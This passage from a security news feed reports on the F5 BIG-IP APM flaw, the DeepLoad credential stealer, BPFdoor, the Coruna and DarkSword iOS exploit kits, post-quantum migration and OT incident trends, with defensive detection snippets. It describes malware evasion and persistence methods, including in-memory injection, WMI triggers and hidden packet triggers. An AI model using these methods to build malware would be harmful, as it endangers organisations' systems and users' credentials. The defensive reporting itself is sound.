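# system of the same BIG-IP version before running.

import hashlib
from pathlib import Path

SUSPECT_FILES = ["/run/bigtlog.pipe", "/run/bigstart.ltm"]

# Hypothetical baseline: path -> SHA-256 of the clean binary.
BASELINE = {
    "/usr/bin/umount": "<sha256-from-known-good-image>",
    "/usr/sbin/httpd": "<sha256-from-known-good-image>",
}

def sha256(path: Path) -> str:
    """Hash a file's contents for comparison against the baseline."""
    return hashlib.sha256(path.read_bytes()).hexdigest()

def sweep(root: str = "/") -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    for rel in SUSPECT_FILES:
        if (Path(root) / rel.lstrip("/")).exists():
            findings.append(f"unexpected file present: {rel}")
    for rel, expected in BASELINE.items():
        target = Path(root) / rel.lstrip("/")
        if target.exists() and sha256(target) != expected:
            findings.append(f"hash mismatch: {rel}")
    return findings
```

Comparing timestamps and file sizes, as F5 recommends, would follow the same pattern using `Path.stat()`.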

Security firm Defused reported observing scanning activity targeting this vulnerability shortly after its addition to the CISA KEV catalog. In a public update on the social media platform X, Defused noted that unauthorized scanning frequently targets the `/mgmt/shared/identified-devices/config/device-info` endpoint. This specific BIG-IP REST API endpoint returns system-level information, including hostnames, machine IDs, and base MAC addresses.
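
Defenders reviewing access logs for this fingerprinting activity can start with a simple filter on the endpoint path. The sketch below assumes a combined-log-style format with the client IP as the first field; adapt the parsing to whatever log source actually fronts your BIG-IP management interface.

```python
# Sketch: flag access-log lines that touch the device-info REST endpoint
# noted above. The log format here is a generic combined-log assumption.

SCAN_PATH = "/mgmt/shared/identified-devices/config/device-info"

def flag_scans(log_lines):
    """Yield (source_ip, line) for requests hitting the fingerprinting endpoint."""
    for line in log_lines:
        if SCAN_PATH in line:
            source_ip = line.split()[0]  # client IP is the first field
            yield source_ip, line

sample = [
    '203.0.113.7 - - [28/Mar/2026:10:02:11 +0000] "GET /mgmt/shared/identified-devices/config/device-info HTTP/1.1" 401 0',
    '198.51.100.9 - - [28/Mar/2026:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 512',
]
for ip, _ in flag_scans(sample):
    print(ip)  # → 203.0.113.7
```

Even authenticated 401 responses to this path are worth aggregating by source IP, since the endpoint's value to an attacker is reconnaissance rather than immediate compromise.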

Simo Kohonen, founder and CEO of Defused, stated that while their BIG-IP honeypot infrastructure regularly records unauthorized access attempts, the recent activity shows distinct changes in how threat actors fingerprint F5 instances.

"Generic mass exploiters consistently use the same type of payload, but we've observed minor deviations to the payloads in the past week, which suggests more actors out there are looking at mapping out F5 infrastructure," Kohonen said.

## Remediation and next steps

F5 infrastructure remains a high-value target for threat actors mapping enterprise perimeters. Last year, state-sponsored groups gained unauthorized access to F5 systems, resulting in the exposure of sensitive data that included source code for the BIG-IP platform.

Given the reclassification and active targeting of CVE-2025-53521, organizations should prioritize upgrading vulnerable BIG-IP APM instances to a fixed version. Security teams must also review system logs and file integrity based on the provided IoCs to ensure no unauthorized access has occurred prior to patching.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>DeepLoad credential stealer uses AI-generated padding and ClickFix delivery to evade static detection</title>
        <link>https://security.shortwaves.live/blog/b02aadc1-d209-4e37-b7d4-b4f262ac858a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/b02aadc1-d209-4e37-b7d4-b4f262ac858a</guid>
        <pubDate>Tue, 31 Mar 2026 03:13:24 GMT</pubDate>
        <description>Security researchers have identified DeepLoad, a new malware strain that captures credentials immediately upon execution and uses process injection to evade static scanning. To fully remediate affected hosts, organizations must look beyond standard file cleanup and address persistent WMI event subscriptions.</description>
        <content:encoded><![CDATA[
            Security researchers have analyzed a new malware strain tracked as DeepLoad, which is capable of capturing credentials immediately after gaining a foothold on a network. The malware relies on a standalone stealer and an unsafe browser extension to capture both stored browser passwords and live keystrokes in real time.

According to ReliaQuest, DeepLoad presents unique containment challenges due to its likely use of AI-generated code for evasion and process injection techniques that bypass static detection. It also establishes a persistence mechanism that can silently re-trigger the execution chain even after an affected host appears fully remediated.

## DeepLoad delivery via ClickFix

DeepLoad operators distribute the credential stealer across enterprise environments using the ClickFix social engineering technique. This method begins with affected users receiving fake browser prompts that ask them to execute a seemingly benign command to resolve a fabricated system error.

When executed, this command immediately creates a scheduled task to re-execute the loader. This ensures the unauthorized access persists across system reboots or partial detection without any further user interaction. The sequence then uses mshta.exe, a legitimate Windows utility, to communicate with external infrastructure and download a heavily obfuscated PowerShell loader.

Because DeepLoad captures credentials from the moment it lands, even partial containment can leave an organization with exposed passwords, active session tokens, and compromised accounts. Before the primary execution chain finishes, a standalone credential stealer named filemanager.exe begins running independently, communicating with its own external infrastructure. This component can exfiltrate data even if the main loader is subsequently detected and blocked. Additionally, the malware drops and registers a browser extension that captures credentials as users type them, persisting across browser sessions until explicitly removed.

## Heavily padded loader and process injection

Analysis of DeepLoad indicates that its functional code is hidden beneath thousands of lines of irrelevant code. This volume of padding appears specifically designed to overwhelm static scanning tools, leaving them with no identifiable signatures to flag. The scale and structure of this padding suggest it was likely developed by an AI model rather than a human programmer.

DeepLoad’s core logic consists of a short decryption routine that unpacks its active component entirely in memory. Once unpacked, this component is injected into LockAppHost.exe, a legitimate Windows process that manages the lock screen. Security tools typically do not actively monitor this process, making it an effective location for unauthorized activity.

To carry out the injection, DeepLoad leverages a PowerShell feature called Add-Type to generate a temporary Dynamic Link Library (DLL), which is then dropped into the affected computer's Temp directory. The malware compiles this DLL freshly on every execution, assigning it a randomized filename to ensure that security tools scanning for specific indicators will not find a match. The sequence also disables PowerShell command history to obscure its tracks.

During the evaluated campaign, DeepLoad also demonstrated lateral movement capabilities by spreading to connected USB drives within 10 minutes of the initial infection. The malware wrote more than 40 files to the USB drive of the affected host, disguising them as familiar installers for applications like Chrome, Firefox, and AnyDesk. This mechanism increases the likelihood of a user executing one of the deceptive installers and exposing another machine. It remains unclear whether USB propagation is a permanent feature of DeepLoad or a modular addition for this specific campaign.

## Standard remediation is not enough

Standard cleanup procedures—such as removing scheduled tasks, temporary files, and familiar indicators of compromise (IOCs)—are not sufficient to fully remediate DeepLoad. The malware creates a persistent trigger within Windows Management Instrumentation (WMI) that automatically reruns the sequence without any further user interaction. In one investigated incident, this mechanism re-established unauthorized access a full three days after the affected host appeared to be thoroughly cleaned.

To properly secure affected environments, organizations must audit and remove WMI event subscriptions on exposed hosts before returning them to production. Security teams should enable PowerShell Script Block Logging and behavioral endpoint monitoring to identify unauthorized activity, as traditional file-based scanning will not detect the padded loader. Furthermore, organizations must rotate all credentials associated with an affected system, including saved passwords, active session tokens, and accounts that were in use during the exposure period.
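
The WMI audit step can be sketched as a triage filter over subscription records. On a live Windows host the records would come from the `root\subscription` namespace (for example via `Get-CimInstance`), not from hard-coded dictionaries; the field names mirror the real `CommandLineEventConsumer` class, but the "suspicious consumer" heuristics and allowlist below are illustrative assumptions, not a complete detection.

```python
# Sketch: triage WMI event-subscription records for consumers that launch
# script or command interpreters -- a common persistence pattern. Records
# are modeled as dicts for illustration; the allowlist is a placeholder
# for your environment's known-good subscriptions.

SUSPICIOUS_TOKENS = ("powershell", "mshta", "cmd.exe", "wscript", "cscript")
KNOWN_GOOD_NAMES = {"SCM Event Log Consumer"}  # typical default entry

def suspicious_subscriptions(records):
    """Return consumer records whose command line invokes an interpreter."""
    flagged = []
    for rec in records:
        if rec.get("Name") in KNOWN_GOOD_NAMES:
            continue
        command = (rec.get("CommandLineTemplate") or "").lower()
        if any(tok in command for tok in SUSPICIOUS_TOKENS):
            flagged.append(rec)
    return flagged

records = [
    {"Name": "SCM Event Log Consumer", "CommandLineTemplate": ""},
    {"Name": "Updater", "CommandLineTemplate": "powershell -enc SQBFAFgA..."},
]
for rec in suspicious_subscriptions(records):
    print(rec["Name"])  # → Updater
```

Any flagged subscription should be reviewed alongside its `__EventFilter` and binding before removal, since legitimate management tooling also registers consumers.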

The evidence of AI-generated code suggests a realistic probability that obfuscation techniques will evolve from generic noise to padding tailored specifically to the targeted environment. As WMI subscriptions are added to standard remediation checklists, threat actors will likely shift their persistence mechanisms to other legitimate Windows features that currently receive less scrutiny.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating recent shifts in persistence: F5 APM reclassification and DeepLoad evasion techniques</title>
        <link>https://security.shortwaves.live/blog/f0df3405-4885-4ec0-833f-a254c71d6c53</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/f0df3405-4885-4ec0-833f-a254c71d6c53</guid>
        <pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate>
        <description>Unauthorized actors are increasingly adapting their persistence and evasion methods, utilizing AI-generated code to bypass static analysis and targeting newly reclassified perimeter vulnerabilities. This report details the technical mechanisms behind the DeepLoad credential-theft malware and the escalation of CVE-2025-53521 in F5 BIG-IP systems, providing actionable guidance to protect enterprise environments.</description>
        <content:encoded><![CDATA[
            Security researchers are working with defense teams to address a shift in how unauthorized parties achieve persistence and evade detection. This activity ranges from the use of AI-generated obfuscation to the targeting of reclassified perimeter vulnerabilities. A primary concern for enterprise environments involves an elevated risk profile for F5 BIG-IP systems. Originally disclosed as a denial-of-service issue last October, a vulnerability in the BIG-IP Access Policy Manager (APM) was reclassified this morning as a critical remote code execution (RCE) flaw. Tracked as CVE-2025-53521 with a CVSS score of 9.8, the vulnerability is involved in active security incidents, prompting its addition to the CISA Known Exploited Vulnerabilities catalog.

This escalation aligns with the discovery of DeepLoad, a malware strain that uses AI-generated code to bypass standard security layers. DeepLoad represents an evolution in credential theft, relying on a "ClickFix" social engineering technique to gain initial access. When a user executes a command to resolve a simulated system error, the software immediately captures credentials and establishes a foothold that requires precise remediation to remove. The emergence of DeepLoad and the targeted activity against F5 perimeters point to coordinated efforts to compromise both network edges and end-user workstations.

Technically, DeepLoad relies on highly specific evasion and persistence mechanisms. To bypass static scanning, it hides its functional logic beneath thousands of lines of irrelevant, AI-generated padding. This volume of data overwhelms signature-based tools, which struggle to identify the core decryption routine. Once active, DeepLoad unpacks entirely in memory and injects its core components into `LockAppHost.exe`, a legitimate Windows process responsible for the lock screen. Because security tools rarely monitor this specific process for unauthorized activity, the software operates with high stealth.

Defenders should evaluate DeepLoad’s persistence strategy carefully. Beyond standard scheduled tasks, it creates a persistent trigger within Windows Management Instrumentation (WMI). This ensures that even if a host appears remediated through the removal of files or scheduled tasks, the software can re-execute the entire sequence days later. In one investigated instance, the activity re-triggered three days after an initial cleanup effort. Furthermore, the malware uses a PowerShell feature called `Add-Type` to compile a temporary, randomly named DLL in the Temp directory upon every execution, making file-based indicators a moving target. Lateral movement is also a core capability; DeepLoad can spread to connected USB drives in as little as ten minutes, disguising its components as legitimate installers for applications like Chrome or AnyDesk.

Simultaneously, the threat situation at the network perimeter requires attention following the reclassification of CVE-2025-53521. F5 updated its advisory after receiving new data showing that unauthorized parties can achieve RCE by sending specific traffic to virtual servers configured with BIG-IP APM. This vulnerability affects multiple versions, including 15.1.x, 16.1.x, 17.1.x, and 17.5.x, and impacts systems running in appliance mode. Monitoring activity suggests that malicious actors are moving from generic mass scanning to focused fingerprinting of F5 infrastructure. Researchers have observed unauthorized scanning of the `/mgmt/shared/identified-devices/config/device-info` REST API endpoint, which is used to map machine IDs and hostnames.

Regarding secure communications, researchers are evaluating a reported zero-click vulnerability in Telegram. Tracked as ZDI-CAN-30207, the flaw reportedly allows for system compromise on Android and Linux clients through the receipt of a specially crafted animated sticker. While the Zero Day Initiative (ZDI) recently lowered the severity score from 9.8 to 7.0 to account for server-side mitigations, the core risk remains: the vulnerability reportedly triggers during the preview generation process, requiring no user interaction. Telegram has stated that their server-side validation prevents corrupted stickers from reaching users. However, Italy’s National Cybersecurity Agency has advised caution until full technical details are disclosed in late July.

These developments require a multi-layered response to protect systems and data. For F5 BIG-IP, immediate patching is necessary. Security teams should audit systems for specific indicators of compromise, such as the presence of `/run/bigtlog.pipe` or `/run/bigstart.ltm`. We recommend verifying the integrity of system binaries like `/usr/bin/umount` and `/usr/sbin/httpd`, as unauthorized modifications to these files have occurred in recent campaigns.

When addressing a DeepLoad infection, standard file removal is insufficient. Organizations must specifically audit and remove unauthorized WMI event subscriptions to prevent recurrence. Because the software captures credentials from the moment of execution—including live keystrokes and session tokens—remediation must include a comprehensive password reset and session revocation for all accounts associated with the affected host. To detect the obfuscated PowerShell loaders, teams should enable PowerShell Script Block Logging and prioritize behavioral monitoring over static file scanning.

The use of AI to generate tailored obfuscation indicates that environmental noise will become harder to distinguish from legitimate code. As unauthorized parties shift toward less-monitored Windows features like WMI and specialized processes like `LockAppHost.exe`, defensive strategies must center on behavioral anomalies rather than static indicators. The reported Telegram vulnerability also serves as a reminder that zero-click vectors in messaging applications remain a high-value focus for capable actors targeting individuals with strategic communication needs.

While the server-side mitigations described by Telegram have reduced the immediate severity of the sticker-based issue, the underlying discrepancy between vendor statements and researcher findings leaves a gap in current knowledge. Until the full disclosure in July, users with high-stakes privacy needs should consider utilizing the web version of the application in a sandboxed browser or restricting message reception to trusted contacts.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Analyzing the Shift Toward Evasive Targeting in Core Infrastructure and Mobile Environments</title>
        <link>https://security.shortwaves.live/blog/315c3f74-cbc6-4b00-b96d-021e23228ec6</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/315c3f74-cbc6-4b00-b96d-021e23228ec6</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:15 GMT</pubDate>
        <description>Recent data indicates that high-tier vulnerability frameworks are increasingly being adopted by broader threat groups to target telecommunications and OT environments. This report details the shift toward kernel-level evasion and provides proactive remediation strategies for network monitoring and post-quantum cryptographic agility.</description>
        <content:encoded><![CDATA[
            Over the last 24 hours, the threat situation has shifted toward more sophisticated and stealthy targeting of core infrastructure, ranging from the deep kernels of telecommunications backbones to the mobile devices and industrial systems that support global operations. Today’s developments indicate a concerning trend: high-tier, state-aligned methodologies are increasingly transitioning to opportunistic and financially motivated groups, making enterprise-grade security a moving target. For defensive teams, the perimeter extends well beyond the firewall; it now includes the kernel, the mobile keychain, and the encrypted packet itself.

One significant evolution in evasion comes from the threat group Red Menshen, also known as Earth Bluecrow. Researchers today revealed that the group has refined its BPFdoor Linux kernel module to better evade detection within telecommunications and critical infrastructure networks. Unlike traditional unauthorized software that creates high-volume network noise, BPFdoor operates passively within the Linux kernel, using the Berkeley Packet Filter (BPF) to watch for specific activation criteria. Recent reports show the group has moved away from broad packet monitoring, now strictly hiding its triggers within standard HTTPS and ICMP traffic. By specifically monitoring the 26th byte offset of incoming TLS-encrypted requests, the unauthorized module remains dormant until it identifies a specific value, making it highly evasive to standard traffic inspection tools that categorize the data as benign.
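
To make the trigger mechanism concrete, the sketch below mimics a passive filter that stays dormant unless a single byte at a fixed payload offset matches an activation value. The offset comes from the reporting above; the magic byte used here is purely hypothetical, since real activation values are not public.

```python
# Illustration of the trigger mechanism described above: a dormant check
# against one byte at a fixed offset in the payload. Offset 26 comes from
# the reporting; the magic byte 0x5A is a hypothetical placeholder.

TRIGGER_OFFSET = 26
MAGIC_BYTE = 0x5A  # placeholder -- real activation values are not public

def is_activation_packet(payload: bytes) -> bool:
    """Mimic the passive filter: a single byte at a fixed offset."""
    return len(payload) > TRIGGER_OFFSET and payload[TRIGGER_OFFSET] == MAGIC_BYTE

benign = bytes(64)                                     # all zeros: ignored
trigger = bytes(26) + bytes([MAGIC_BYTE]) + bytes(37)  # magic byte at offset 26
print(is_activation_packet(benign))   # → False
print(is_activation_packet(trigger))  # → True
```

Because everything except that one byte looks like ordinary encrypted traffic, signature-based inspection has nothing stable to match; detection efforts are better spent on the kernel side, auditing for unexpected BPF programs attached to sockets.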

This trend toward high-end evasion is mirrored in the mobile space. Sophisticated iOS vulnerability frameworks like Coruna and DarkSword have moved from the exclusive domain of state-level espionage to broader threat groups. Coruna, which is technically linked to the 2023 "Operation Triangulation" campaign, and DarkSword, whose components were recently published on GitHub, are now utilized by financially motivated groups and Russian-aligned actors like UNC6353. These frameworks are being modified with modules for cryptocurrency theft and credential harvesting. This proliferation means advanced capabilities once reserved for high-value diplomatic targets are now deployed in watering hole campaigns against retail and industrial vendors, lowering the barrier to entry for compromising the modern mobile workforce.

While software-based risks evolve, the physical domain remains under constant pressure. In the Middle East, internet-connected cameras have become strategic intelligence assets. Recent reporting shows a definitive shift in how unauthorized access to IP cameras is leveraged—moving away from botnet recruitment toward operational visibility and reconnaissance. In recent geopolitical events, access to traffic camera networks provided critical intelligence prior to kinetic operations. Following these events, scanning activity against camera networks in Israel and surrounding Gulf nations has spiked. For organizations in sensitive regions, an unpatched or exposed camera is a potential reconnaissance point that requires immediate remediation.

In the industrial sector, the overall volume of physically impactful operational technology (OT) security incidents saw a notable 25% decline in 2025. This marks the first reduction in seven years, likely driven by a temporary stabilization in the ransomware ecosystem and increased law enforcement pressure on major groups. However, defenders should remain vigilant. While physically disruptive events dropped to 57 recorded incidents, the targeting of critical infrastructure without immediate physical disruption doubled over the same period. High-profile cases, such as the security incident at Jaguar Land Rover that resulted in billions of dollars in economic impact, show that even a year with lower overall volume can still produce severe financial and operational consequences.

For security teams tasked with defending these environments, priorities should expand to include proactive, kernel-level telemetry and cryptographic resilience. Detecting BPFdoor requires monitoring for unauthorized BPF filters attached to network interfaces and restricting unnecessary ICMP communication between internal servers. Red Menshen frequently leverages the ICMP value `0xFFFFFFFF` to route commands between affected machines; we recommend integrating this pattern into internal traffic monitoring. On the mobile front, frameworks like Coruna can extract entire keychains and credentials in minutes. Relying solely on the native security of mobile operating systems is insufficient. Organizations need visibility platforms capable of detecting the anomalous behavior of these complex vulnerability frameworks before lateral movement begins.

As we build longer-term resilience, Google’s commitment today to a 2029 post-quantum cryptography (PQC) timeline provides a clear roadmap for the industry. Protecting authentication services and digital signatures is a critical defensive pivot. While the risk of "store-now-decrypt-later" exists for encrypted data, the risk to digital signatures requires transition before a cryptographically relevant quantum computer is realized. Security teams can begin this path today by conducting cryptographic inventories and ensuring that new deployments prioritize crypto agility, allowing for the seamless swapping of algorithms as NIST standards are finalized.

The convergence of state-level tools with malicious intent suggests a future where high-complexity methodologies are standard practice. Threat actors are tailoring BPFdoor to mimic legitimate HPE ProLiant and Kubernetes services, showing an intimate understanding of modern data center architecture. Defenders can match this knowledge by working closely with infrastructure teams to ensure kernel-level telemetry is captured and analyzed.

Gaps remain in our understanding of how these high-end tools are traded on the secondary market—specifically whether brokers or the actors themselves are adding new financial theft modules to kits like Coruna. Additionally, while the decline in OT incidents is a positive metric, a lack of transparency in reporting and potential legal liabilities suggest the true number of physical disruptions may be higher than public data indicates.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>The Proliferation of Advanced iOS Vulnerability Frameworks: Coruna and DarkSword</title>
        <link>https://security.shortwaves.live/blog/855e8b96-64de-4084-8030-6cf9dffaed49</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/855e8b96-64de-4084-8030-6cf9dffaed49</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:15 GMT</pubDate>
        <description>Two sophisticated iOS vulnerability frameworks, Coruna and DarkSword, have transitioned from highly resourced origins to financially motivated threat actors. This shift emphasizes the need for organizations to implement comprehensive mobile visibility and credential protection, and to defend against advanced lateral movement capabilities.</description>
        <content:encoded><![CDATA[
            Coruna, an advanced mobile vulnerability framework utilizing zero-day vulnerabilities for high-level espionage operations, shares technical links with the 2023 Operation Triangulation surveillance campaign. Recent analysis shows that Coruna, along with a similar framework known as DarkSword, has transitioned into the hands of financially motivated groups and a Russian state-aligned actor tracked as UNC6353.

Furthermore, components of DarkSword were recently published to GitHub. This release significantly lowers the barrier to entry, placing advanced iOS compromise capabilities within reach of a broader range of unauthorized actors and requiring organizations to evaluate their mobile defense posture.

Rocky Cole, co-founder of iVerify—which analyzed both frameworks—indicates that the technology underlying Coruna was likely developed by Trenchant, the surveillance tech division of US military contractor L3Harris. Meanwhile, DarkSword, a separate tool with a comparable operational history, was likely developed in the Gulf region, potentially by the DarkMatter Group or former personnel.

"In the case of Coruna, it was very likely a government contractor who sold it to zero-day brokers," Cole notes. "In the case of DarkSword, I think it's possible the firm that developed it went defunct and offloaded it to try to salvage some investment. Either way, it made its way onto the secondary market for resale, and then from there fell into the hands of Russian state operators."

UNC6353 has deployed both tools via watering hole campaigns in Ukraine. These operations focused on commercial targets, including industrial and retail vendors, as well as local services and a news agency in the Donbas region. Researchers note that DarkSword has also been utilized by multiple commercial surveillance companies and suspected state-sponsored actors across Saudi Arabia, Turkey, Malaysia, and Ukraine. Following the GitHub publication, broader experimentation by unauthorized users has been observed.

## Technical Links to Operation Triangulation

In early 2023, Kaspersky identified anomalous behavior during routine security monitoring; the activity was detected internally on the company's own employees' devices.

This discovery provided the first evidence of Operation Triangulation, a four-year surveillance campaign affecting thousands of devices in Russia, including those of senior Kaspersky personnel and diplomatic missions. Russia's Federal Security Service (FSB) attributed the activity to the US National Security Agency (NSA).

Subsequent analysis by iVerify researchers revealed clear structural overlaps between the software used in Operation Triangulation and the newly discovered Coruna iOS framework. Following further technical review, Kaspersky confirmed that Coruna functions as an evolution of Operation Triangulation. The framework has since incorporated four new iOS kernel vulnerabilities, establishing a total of five vulnerability chains spanning 23 distinct CVEs.

Threat actors have actively customized this core architecture with varying delivery mechanisms and final modules tailored to specific operational objectives.

"The big difference between kits like Coruna and DarkSword and other top-tier iOS spyware is that both of the former tools had additional code added to them by an unknown party to introduce financial theft and cryptocurrency capabilities," explains Justin Albrecht, principal researcher at Lookout.

For example, while Coruna was originally deployed against highly specific targets, Google Threat Intelligence observed UNC6353 embedding it within invisible iframes on compromised Ukrainian websites. Additionally, a Chinese threat group tracked as UNC6691 removed the framework's geolocation restrictions to distribute it across cryptocurrency scam sites. UNC6691's deployment featured custom modules designed specifically for cryptocurrency theft, marking a significant departure from Coruna's original espionage focus.

Google researchers noted: "It’s not known whether the additional code was accomplished by the second-hand broker, or by the threat actors themselves, but we consider it highly likely that both Coruna and DarkSword were acquired and then modified to conduct financial theft as well as espionage."

## State-Level Capabilities Reach Financially Motivated Actors

Coruna is not the first advanced cyber capability to transition into Russian possession, and DarkSword represents the latest in a series of commercial surveillance tools utilized by non-state actors. However, the current environment demonstrates these tools migrating further down the resource chain to financially motivated groups.

Albrecht notes that the transfer of capabilities between state intelligence apparatuses and criminal organizations aligns with documented operational models. "We should consider Russia’s well documented use of criminal proxy groups to target Ukraine and to conduct financial theft," he says. "The relationship between Russian Intelligence organizations and various Russian cybercriminal groups, such as a partnership between RomCom and Trickbot, essentially functions as a modern-day privateer model."

This dynamic results in lower-tier threat actors operating with state-level technical capabilities. As Cole observes, "Coruna has 23 vulnerabilities across five chains. It probably costs $30 million to $40 million to develop something like that," a development cost far exceeding typical non-government malware.

## Defending Against Advanced Mobile Threats

As premium surveillance capabilities continue to proliferate to financially motivated threat actors, organizations that previously considered themselves outside the scope of advanced persistent threats (APTs) must update their defensive models.

Albrecht advises security leaders to prioritize advanced mobile protections and visibility platforms. "Consider that malware like this pulls entire keychains and credentials off of the device in minutes," he says. "At this point the risk isn’t only to the mobile device itself, because the attacker now has credentials and can merely log in to the corporate network. They have all Wi-Fi credentials, so their level of access and potential for lateral movement is elevated. Without visibility and protection on the iOS devices there’s no protection beyond what the OS provides to stop these attacks, and there’s certainly no visibility to know how and where the attack started."

Cole reinforces this assessment, noting that while Apple has patched the specific vulnerabilities utilized by these frameworks...
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Preparing for Google&apos;s 2029 post-quantum cryptography timeline</title>
        <link>https://security.shortwaves.live/blog/67f1e0ab-9cdc-48da-b354-e732a1cda69d</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/67f1e0ab-9cdc-48da-b354-e732a1cda69d</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:15 GMT</pubDate>
        <description>Google has committed to integrating post-quantum cryptography (PQC) across its infrastructure by the end of 2029, with a specific focus on protecting authentication services. Security teams can begin preparing today by conducting cryptographic inventories, building crypto agility, and confirming vendor migration roadmaps.</description>
        <content:encoded><![CDATA[
            Google has established a timeline to integrate post-quantum cryptography (PQC) across its systems, products, and services by the end of 2029. Detailed in a recent announcement by Heather Adkins, vice president of security engineering, and Sophie Schmieg, senior staff cryptography engineer at Google, the migration aims to safeguard digital infrastructure against the evolving capabilities of quantum computation.

While quantum computers promise significant advancements in science, they also introduce risks to current authentication and encryption methodologies. As this technology becomes more accessible, unauthorized parties may use it to bypass existing security controls. To protect users and data, organizations like Google, Apple, and various public sector entities are prioritizing cryptographic algorithms designed to resist quantum computation. This transition is guided by the National Institute of Standards and Technology (NIST), which published its first finalized PQC standards in 2024.

## Google's post-quantum migration strategy

Google’s transition focuses on safely migrating to a post-quantum state within NIST’s current guidelines. The company has already begun rolling out PQC within its internal operations and products, centering its efforts on three areas: maintaining crypto agility, securing critical shared infrastructure, and supporting ecosystem-wide shifts to create a more resilient long-term security architecture.

A key detail in Google's updated threat model is the specific prioritization of authentication services. While encryption faces immediate exposure from "store-now-decrypt-later" data collection—where unauthorized parties gather encrypted data today to decrypt it once quantum technology matures—digital signatures represent a future risk that requires a transition to PQC before a Cryptographically Relevant Quantum Computer (CRQC) is developed. Google recommends that engineering teams prioritize PQC migration for authentication services to protect digital signatures and online security.

Supporting this 2029 commitment, Android 17 will integrate PQC digital signature protection using the Module-Lattice-Based Digital Signature Algorithm (ML-DSA). This addition expands upon previously announced post-quantum support within Google Chrome and Google Cloud.

## Preparing systems for the quantum transition

Security experts emphasize that a 2029 timeline is manageable and represents a proactive security posture. Melina Scotto, a cybersecurity executive adviser and chief information security officer, notes that while not every organization has Google's resources, engineering teams can prioritize intermediate protective measures, such as implementing strong salting techniques. Adding this layer of randomness to cryptographic processes increases the effort, cost, and time required for unauthorized parties to compromise data using precomputed methods, providing valuable interim protection while comprehensive encryption solutions are finalized.

Dustin Moody from NIST advises that falling behind on quantum preparation introduces broader risks, including future interoperability issues with partners who prioritize PQC. For organizations beginning this process, Moody recommends focusing on methodical preparedness rather than urgency.

Teams can strengthen their posture by taking the following steps:

* Conduct a cryptographic inventory: Build awareness by identifying exactly where and how cryptography is currently used within the environment.

* Engage service providers: Since many organizations rely on third-party solutions, engage with cloud platforms, VPN vendors, and software partners to confirm their specific post-quantum migration plans.

* Design for crypto agility: Ensure systems are built to adapt as cryptographic standards evolve over time.

* Protect sensitive data: Assign the highest priority to systems that protect long-lived sensitive data requiring confidentiality well into the future.
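
The "design for crypto agility" step above is essentially an indirection layer: callers request the current scheme by name instead of hard-coding an algorithm, so swapping in a PQC algorithm later is a configuration change rather than a rewrite. The sketch below illustrates that pattern only; the HMAC-based scheme is a stand-in, since real signature algorithms such as ML-DSA require third-party libraries.

```python
import hashlib
import hmac
from typing import Callable, NamedTuple


class SignatureScheme(NamedTuple):
    sign: Callable[[bytes, bytes], bytes]          # (key, message) -> signature
    verify: Callable[[bytes, bytes, bytes], bool]  # (key, message, signature) -> ok


# Registry: adopting a PQC scheme later means registering it here and
# flipping CURRENT_SCHEME -- no call sites change.
SCHEMES = {
    "hmac-sha256": SignatureScheme(
        sign=lambda key, msg: hmac.new(key, msg, hashlib.sha256).digest(),
        verify=lambda key, msg, sig: hmac.compare_digest(
            hmac.new(key, msg, hashlib.sha256).digest(), sig
        ),
    ),
    # "ml-dsa-65": SignatureScheme(...)  # registered once a vetted library is adopted
}

CURRENT_SCHEME = "hmac-sha256"


def sign(key: bytes, message: bytes) -> bytes:
    return SCHEMES[CURRENT_SCHEME].sign(key, message)


def verify(key: bytes, message: bytes, signature: bytes) -> bool:
    return SCHEMES[CURRENT_SCHEME].verify(key, message, signature)
```

The design choice is that algorithm names, not implementations, cross module boundaries; that is what lets an inventory-driven migration proceed service by service.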
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Operational Technology Security Incidents With Physical Consequences Decline by 25%</title>
        <link>https://security.shortwaves.live/blog/aafdbfce-f042-4cfa-87e7-18a65b34a2f9</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/aafdbfce-f042-4cfa-87e7-18a65b34a2f9</guid>
        <pubDate>Sat, 28 Mar 2026 03:14:14 GMT</pubDate>
        <description>A recent report indicates a 25% drop in physically impactful OT security incidents in 2025. We review the data, the underlying factors driving this change, and why event severity remains high despite the lower overall volume.</description>
        <content:encoded><![CDATA[
            The volume of major operational technology (OT) security incidents declined in 2025, marking the first reduction in seven years. Security metrics rarely show a downward trend without significant changes in the threat landscape, making this anomaly an important data point for evaluating industrial defense strategies.

Historically, the number of OT incidents resulting in physical consequences for affected organizations has consistently grown, rising from a few isolated events prior to 2019 to 76 recorded incidents in 2024. According to the newly published annual report from Waterfall Security Solutions, 2025 deviated from this pattern. The organization identified 57 physically impactful OT incidents over the year, a 25% decrease that brings the total below both 2024 and 2023 levels.

Understanding the drivers behind this shift helps security teams anticipate future trends and focus their resources effectively.

## Factors influencing the decline

Researchers propose three primary hypotheses for the reduction in public OT incidents last year.

The first suggests that improved security practices are successfully protecting critical systems and giving defenders an edge. While difficult to measure comprehensively, this theory contrasts with the nature of some incidents that still occurred. For example, in January 2025, an unauthorized individual in Italy gained access to a system that allowed them to alter the routes of oil tankers and transport ships in the Mediterranean Sea. Andrew Ginter, vice president of industrial security at Waterfall Security Solutions, notes that threat actors frequently access exposed human-machine interfaces (HMIs) using default or compromised credentials. As a foundational protective measure, he strongly recommends that organizations ensure all HMIs are removed from the public internet.

